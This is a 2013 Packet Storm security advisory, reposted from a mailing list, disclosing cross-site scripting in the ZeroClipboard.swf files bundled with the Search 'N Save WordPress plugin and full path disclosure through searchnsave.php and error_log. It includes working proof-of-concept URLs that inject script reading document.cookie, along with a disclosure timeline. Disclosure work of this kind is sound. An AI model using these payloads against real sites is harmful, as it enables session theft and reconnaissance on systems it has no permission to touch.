WordPress Search N Save XSS / Path Disclosure

2013-07-07T00:00:00
ID PACKETSTORM:122304
Type packetstorm
Reporter MustLive
Modified 2013-07-07T00:00:00

Description

                                        
                                            `Hello list!  
  
I want to inform you about vulnerabilities in Search 'N Save plugin for   
WordPress.  
  
These are Cross-Site Scripting and Full path disclosure vulnerabilities.   
These XSS holes are in ZeroClipboard.swf, which is used in the plugin. In   
February I wrote about Cross-Site Scripting vulnerabilities in ZeroClipboard   
(http://seclists.org/fulldisclosure/2013/Feb/103) and in multiple web   
applications.  
  
-------------------------  
Affected products:  
-------------------------  
  
Vulnerable are all versions of Search 'N Save.  
  
-------------------------  
Affected vendors:  
-------------------------  
  
Table For 7 Media  
http://tablefor7media.com  
  
----------  
Details:  
----------  
  
Cross-Site Scripting (WASC-08):  
  
XSS via id parameter and XSS via copying payload into clipboard.  
  
http://site/wp-content/plugins/SearchNSave/js/zeroclipboard/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height  
  
http://site/wp-content/plugins/SearchNSave/js/zeroclipboard/ZeroClipboard10.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height  
  
Full path disclosure (WASC-13):  
  
http://site/wp-content/plugins/SearchNSave/searchnsave.php  
  
http://site/wp-content/plugins/SearchNSave/error_log (leakage of full paths   
at web sites where showing errors is off and they are saving into error_log)  
  
------------  
Timeline:  
------------   
  
2013.02.18 - informed old and new developers of ZeroClipboard.  
2013.05.10 - announced at my site.  
2013.05.11 - informed developers of Search and Share.  
2013.07.04 - disclosed at my site (http://websecurity.com.ua/6499/).  
  
Best wishes & regards,  
MustLive  
Administrator of Websecurity web site  
http://websecurity.com.ua   
  
`